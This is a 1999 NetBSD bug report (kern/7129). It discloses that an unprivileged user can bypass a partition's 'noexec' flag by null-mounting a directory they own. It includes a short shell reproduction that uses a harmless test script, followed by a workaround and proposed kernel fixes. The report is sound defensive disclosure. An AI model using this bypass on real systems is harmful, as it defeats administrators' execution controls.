Subject: kern/7129: normal user can bypass mount 'noexec' flags
To: None <gnats-bugs@gnats.netbsd.org>
From: Manuel Bouyer <bouyer@antioche.lip6.fr>
List: netbsd-bugs
Date: 03/11/1999 16:52:50
>Number: 7129
>Category: kern
>Synopsis: normal user can bypass mount 'noexec' flags
>Confidential: no
>Severity: serious
>Priority: high
>Responsible: kern-bug-people (Kernel Bug People)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Thu Mar 11 08:05:00 1999
>Last-Modified:
>Originator: Manuel Bouyer
>Organization:
LIP6, Universite Paris VI.
>Release: 1.3.3 and the 1.3I i386 snapshot
>Environment:
System: NetBSD antifer.ipv6.lip6.fr 1.3.3 NetBSD 1.3.3 (ANTIFER) #1: Sun Feb 28 17:30:48 MET 1999 bouyer@antifer.ipv6.lip6.fr:/usr/src/NetBSD/src/sys/arch/i386/compile/ANTIFER i386
>Description:
It is possible for a normal user to bypass the 'noexec' mount flag,
by using a null mount on a directory owned by itself.
>How-To-Repeat:
garfield:/cd1>id
uid=331(bouyer) gid=100 groups=100, 0(wheel)
garfield:/cd1>pwd
/cd1
garfield:/cd1>mount | fgrep cd1
/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
garfield:/cd1>ls -l
total 3
-rwxr-xr-x 1 bouyer wheel 30 Mar 11 16:39 toto.sh
garfield:/tmp/d>cat toto.sh
#! /bin/sh
echo "not good !"
garfield:/cd1>./toto.sh
./toto.sh: Permission denied.
garfield:/cd1>mkdir /tmp/d
garfield:/cd1>mount -t null /cd1 /tmp/d
garfield:/cd1>cd !$
cd /tmp/d
garfield:/tmp/d>./toto.sh
not good !
>Fix:
Workaround: assure no regular user can execute a binary in a partition
they can write (what's the purpose of 'noexec' otherwise ?), and
supress read/execute permissions on /sbin/mount_* for all but owner.
A long term fix needs to change the semantic of mount for non-root
users:
- mounts for non-root users are always 'noexec' (as they already are
'nodev, nosuid'), possibly dependant on the kernel security level
- or inherit the noexec flag from the partition the target directory
will be mounted on.
>Audit-Trail:
>Unformatted: